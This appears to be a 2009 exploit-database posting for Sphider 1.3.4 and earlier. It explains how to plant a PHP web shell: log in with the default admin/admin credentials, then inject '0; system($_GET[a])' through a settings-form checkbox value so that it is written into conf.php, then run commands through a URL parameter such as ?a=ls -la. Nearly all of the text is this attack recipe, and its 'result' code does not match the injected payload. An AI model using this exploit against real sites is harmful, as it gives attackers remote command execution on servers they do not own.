sphider143-exec.txt
Posted on 27 August 2009
=============================== [sphider] <= 1.3.4 adding shell =============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com [~] Username and pass are stored in: http://site.com/sphider/admin/auth.php Default: PHP code: error_reporting(E_ERROR | E_PARSE); $admin = "admin"; $admin_pw = "admin"; [~] filled shells. Vulnerable code: PHP code: if ($_index_pdf=="") { $_index_pdf=0; } ... fwrite($fhandle, " // Index pdf files "); fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";"); The easiest is to do opera. Go to Source and change this: HTML code: <input name="_index_pdf" type="checkbox" value="0" id="index_pdf" > so HTML code: <input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" > Save your settings. As a result, we have: PHP code: // Index pdf files $index_pdf = 0; echo($_GET[a]); http://site.com/sphider/settings/conf.php?a=ls -la ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
